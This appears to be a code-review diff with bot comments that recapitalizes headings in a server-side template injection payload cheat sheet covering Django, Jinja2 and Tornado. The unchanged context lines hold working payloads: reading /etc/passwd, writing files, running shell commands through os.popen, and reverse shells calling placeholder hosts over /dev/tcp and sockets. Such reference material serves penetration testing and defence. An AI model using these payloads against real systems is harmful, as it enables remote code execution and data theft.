7
7
8
8
- [ Templating Libraries] ( #templating-libraries )
9
9
- [ Django] ( #django )
10
- - [ Django - Basic injection ] ( #django---basic-injection )
11
- - [ Django - Cross-site scripting ] ( #django---cross-site-scripting )
12
- - [ Django - Debug information leak ] ( #django---debug-information-leak )
13
- - [ Django - Leaking app 's Secret Key] ( #django---leaking-apps-secret-key )
10
+ - [ Django - Basic Injection ] ( #django---basic-injection )
11
+ - [ Django - Cross-Site Scripting ] ( #django---cross-site-scripting )
12
+ - [ Django - Debug Information Leak ] ( #django---debug-information-leak )
13
+ - [ Django - Leaking App 's Secret Key] ( #django---leaking-apps-secret-key )
14
14
- [ Django - Admin Site URL leak] ( #django---admin-site-url-leak )
15
- - [ Django - Admin username and password hash leak ] ( #django---admin-username-and-password-hash-leak )
15
+ - [ Django - Admin Username and Password Hash Leak ] ( #django---admin-username-and-password-hash-leak )
16
16
- [ Jinja2] ( #jinja2 )
17
- - [ Jinja2 - Basic injection ] ( #jinja2---basic-injection )
18
- - [ Jinja2 - Template format ] ( #jinja2---template-format )
17
+ - [ Jinja2 - Basic Injection ] ( #jinja2---basic-injection )
18
+ - [ Jinja2 - Template Format ] ( #jinja2---template-format )
19
19
- [ Jinja2 - Debug Statement] ( #jinja2---debug-statement )
20
- - [ Jinja2 - Dump all used classes ] ( #jinja2---dump-all-used-classes )
21
- - [ Jinja2 - Dump all config variables ] ( #jinja2---dump-all-config-variables )
22
- - [ Jinja2 - Read remote file ] ( #jinja2---read-remote-file )
23
- - [ Jinja2 - Write into remote file ] ( #jinja2---write-into-remote-file )
20
+ - [ Jinja2 - Dump All Used Classes ] ( #jinja2---dump-all-used-classes )
21
+ - [ Jinja2 - Dump All Config Variables ] ( #jinja2---dump-all-config-variables )
22
+ - [ Jinja2 - Read Remote File ] ( #jinja2---read-remote-file )
23
+ - [ Jinja2 - Write Into Remote File ] ( #jinja2---write-into-remote-file )
24
24
- [ Jinja2 - Remote Command Execution] ( #jinja2---remote-command-execution )
25
- - [ Forcing output on blind RCE] ( #jinja2---forcing-output-on-blind-rce )
26
- - [ Exploit the SSTI by calling os.popen().read()] ( #exploit-the-ssti-by-calling-ospopenread )
27
- - [ Exploit the SSTI by calling subprocess.Popen] ( #exploit-the-ssti-by-calling-subprocesspopen )
28
- - [ Exploit the SSTI by calling Popen without guessing the offset ] ( #exploit-the-ssti-by-calling-popen-without-guessing-the-offset )
29
- - [ Exploit the SSTI by writing an evil config file. ] ( #exploit-the-ssti-by-writing-an-evil-config-file )
30
- - [ Jinja2 - Filter bypass ] ( #jinja2---filter-bypass )
25
+ - [ Forcing Output On Blind RCE] ( #jinja2---forcing-output-on-blind-rce )
26
+ - [ Exploit The SSTI By Calling os.popen().read()] ( #exploit-the-ssti-by-calling-ospopenread )
27
+ - [ Exploit The SSTI By Calling subprocess.Popen] ( #exploit-the-ssti-by-calling-subprocesspopen )
28
+ - [ Exploit The SSTI By Calling Popen Without Guessing The Offset ] ( #exploit-the-ssti-by-calling-popen-without-guessing-the-offset )
29
+ - [ Exploit The SSTI By Writing an Evil Config File ] ( #exploit-the-ssti-by-writing-an-evil-config-file )
30
+ - [ Jinja2 - Filter Bypass ] ( #jinja2---filter-bypass )
31
31
- [ Tornado] ( #tornado )
32
- - [ Tornado - Basic injection ] ( #tornado---basic-injection )
32
+ - [ Tornado - Basic Injection ] ( #tornado---basic-injection )
33
33
- [ Tornado - Remote Command Execution] ( #tornado---remote-command-execution )
34
34
- [ Mako] ( #mako )
35
35
- [ Mako - Remote Command Execution] ( #mako---remote-command-execution )
54
54
55
55
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
56
56
57
- ### Django - Basic injection
57
+ ### Django - Basic Injection
58
58
59
59
``` python
60
60
{% csrf_token % } # Causes error with Jinja2
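Review bot: the new TOC entries mix two title-case rules within the same hunk: "Forcing Output On Blind RCE" and "Exploit The SSTI By Calling os.popen().read()" capitalize function words, while "Django - Admin Username and Password Hash Leak" keeps "and" lowercase and "Exploit The SSTI By Writing an Evil Config File" keeps "an" lowercase. Pick one convention (conventional title case would leave "on", "by", "the", "and", "an" lowercase) and apply it to the TOC and the body headings alike, so the link text matches the heading the reader lands on; the anchor slugs are lowercased, so the links resolve either way.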
@@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
63
63
```
64
64
65
65
66
- ### Django - Cross-site scripting
66
+ ### Django - Cross-Site Scripting
67
67
68
68
``` python
69
69
{{ ' <script>alert(3)</script>' }}
70
70
{{ ' <script>alert(3)</script>' | safe }}
71
71
```
72
72
73
- ### Django - Debug information leak
73
+ ### Django - Debug Information Leak
74
74
75
75
``` python
76
76
{% debug % }
77
77
```
78
78
79
- ### Django - Leaking app’ s Secret Key
79
+ ### Django - Leaking App' s Secret Key
80
80
81
81
``` python
82
82
{{ messages.storages.0.signer.key }}
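Review bot: the "Django - Leaking App's Secret Key" heading also swaps the curly apostrophe for a straight one, which is more than the capitalization change the rest of the hunk makes. It is a sensible normalization (GitHub strips punctuation when building heading slugs, so `#django---leaking-apps-secret-key` resolves with either character), but it should be mentioned in the change description so it does not look accidental.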
@@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
89
89
{% include 'admin/base.html' %}
90
90
```
91
91
92
- ### Django - Admin username and password hash leak
92
+ ### Django - Admin Username And Password Hash Leak
93
93
94
94
95
95
```
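Review bot: this heading becomes "Django - Admin Username And Password Hash Leak" with a capital "And", but the TOC entry added in the first hunk reads "Admin Username and Password Hash Leak" with a lowercase "and". The link still works because slugs are lowercased, yet the visible text now disagrees; lowercase "and" in the heading is the conventional choice.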
@@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
104
104
[ Official website] ( https://jinja.palletsprojects.com/ )
105
105
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
106
106
107
- ### Jinja2 - Basic injection
107
+ ### Jinja2 - Basic Injection
108
108
109
109
``` python
110
110
{{4 * 4 }}[[5 * 5 ]]
@@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
115
115
Jinja2 is used by Python Web Frameworks such as Django or Flask.
116
116
The above injections have been tested on a Flask application.
117
117
118
- ### Jinja2 - Template format
118
+ ### Jinja2 - Template Format
119
119
120
120
``` python
121
121
{% extends " layout.html" % }
@@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump
139
139
140
140
Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
141
141
142
- ### Jinja2 - Dump all used classes
142
+ ### Jinja2 - Dump All Used Classes
143
143
144
144
``` python
145
145
{{ [].class .base.subclasses() }}
@@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
153
153
{{ self .__init__ .__globals__ .__builtins__ }}
154
154
```
155
155
156
- ### Jinja2 - Dump all config variables
156
+ ### Jinja2 - Dump All Config Variables
157
157
158
158
``` python
159
159
{% for key, value in config.iteritems() % }
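Review bot: unrelated to the heading rename, but the context line `{% for key, value in config.iteritems() %}` only works under Python 2; `dict.iteritems()` was removed in Python 3, where Flask's `config` (a dict subclass) exposes `config.items()`. Worth a follow-up fix or a note, since readers testing on a current Flask install will get an error rather than the config dump.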
@@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
162
162
{% endfor % }
163
163
```
164
164
165
- ### Jinja2 - Read remote file
165
+ ### Jinja2 - Read Remote File
166
166
167
167
``` python
168
168
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
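Review bot: also outside this hunk's change, the comment `# ''.__class__.__mro__[2].__subclasses__()[40] = File class` describes a Python 2 layout: on Python 3 the `str` MRO is `(str, object)`, so index 2 is out of range, and the `[40]` position depends on which classes the running interpreter has loaded. A caveat like the existing ":warning: the number 396 will vary depending of the application." note further down would help here too.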
@@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
172
172
{{ get_flashed_messages.__globals__ .__builtins__ .open(" /etc/passwd" ).read() }}
173
173
```
174
174
175
- ### Jinja2 - Write into remote file
175
+ ### Jinja2 - Write Into Remote File
176
176
177
177
``` python
178
178
{{ ' ' .__class__ .__mro__ [2 ].__subclasses__ ()[40 ](' /var/www/html/myflaskapp/hello.txt' , ' w' ).write(' Hello here !' ) }}
@@ -186,7 +186,7 @@ Listen for connection
186
186
nc -lnvp 8000
187
187
```
188
188
189
- #### Jinja2 - Forcing output on blind RCE
189
+ #### Jinja2 - Forcing Output On Blind RCE
190
190
191
191
You can import Flask functions to return an output from the vulnerable page.
192
192
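Review bot: the body heading is "#### Jinja2 - Forcing Output On Blind RCE" but the matching TOC entry added in the first hunk reads just "Forcing Output On Blind RCE", without the "Jinja2 - " prefix its sibling entries carry, even though its anchor `#jinja2---forcing-output-on-blind-rce` includes it. Adding the prefix to the TOC text keeps the list consistent and makes the link text match the heading.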
@@ -203,7 +203,7 @@ def hook(*args, **kwargs):
203
203
```
204
204
205
205
206
- # ### Exploit the SSTI by calling os.popen().read()
206
+ # ### Exploit The SSTI By Calling os.popen().read()
207
207
208
208
```python
209
209
{{ self .__init__ .__globals__ .__builtins__ .__import__(' os' ).popen(' id' ).read() }}
@@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa
235
235
236
236
Source: https:// twitter.com/ podalirius_/ status/ 1655970628648697860
237
237
238
- # ### Exploit the SSTI by calling subprocess.Popen
238
+ # ### Exploit The SSTI By Calling subprocess.Popen
239
239
240
240
:warning: the number 396 will vary depending of the application.
241
241
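Review bot: the context line ":warning: the number 396 will vary depending of the application." has a grammar slip, "depending of" should be "depending on", and since this hunk already touches the neighbouring heading it is a cheap fix to fold in.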
@@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
244
244
{{config.__class__ .__init__ .__globals__ [' os' ].popen(' ls' ).read()}}
245
245
```
246
246
247
- # ### Exploit the SSTI by calling Popen without guessing the offset
247
+ # ### Exploit The SSTI By Calling Popen Without Guessing The Offset
248
248
249
249
```python
250
250
{% for x in ().__class__ .__base__.__subclasses__ () % }{% if " warning" in x.__name__ % }{{x()._module.__builtins__ [' __import__' ](' os' ).popen(" python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\" ip\" ,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\" /bin/cat\" , \" flag.txt\" ]);'" ).read().zfill(417 )}}{% endif% }{% endfor % }
@@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
257
257
{% for x in ().__class__ .__base__.__subclasses__ () % }{% if " warning" in x.__name__ % }{{x()._module.__builtins__ [' __import__' ](' os' ).popen(request.args.input).read()}}{% endif% }{% endfor% }
258
258
```
259
259
260
- # ### Exploit the SSTI by writing an evil config file.
260
+ # ### Exploit The SSTI By Writing An Evil Config File
261
261
262
262
```python
263
263
# evil config
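Review bot: the heading becomes "Exploit The SSTI By Writing An Evil Config File" with a capital "An", while the TOC entry in the first hunk reads "Writing an Evil Config File" with a lowercase "an"; the trailing period is correctly dropped in both places. Align the two, preferably on lowercase "an".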
@@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
270
270
{{ config[' RUNCMD' ](' /bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"' ,shell = True ) }}
271
271
```
272
272
273
- # ## Jinja2 - Filter bypass
273
+ # ## Jinja2 - Filter Bypass
274
274
275
275
```python
276
276
request.__class__
@@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
313
313
314
314
# # Tornado
315
315
316
- # ## Tornado - Basic injection
316
+ # ## Tornado - Basic Injection
317
317
318
318
```py
319
319
{{7 * 7 }}
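Review bot: minor style point visible in the context lines, the Tornado block is fenced as ```` ```py ```` while every other block in the file uses ```` ```python ````; both render the same, but the file would be more consistent with one tag, and this hunk is a convenient place to change it.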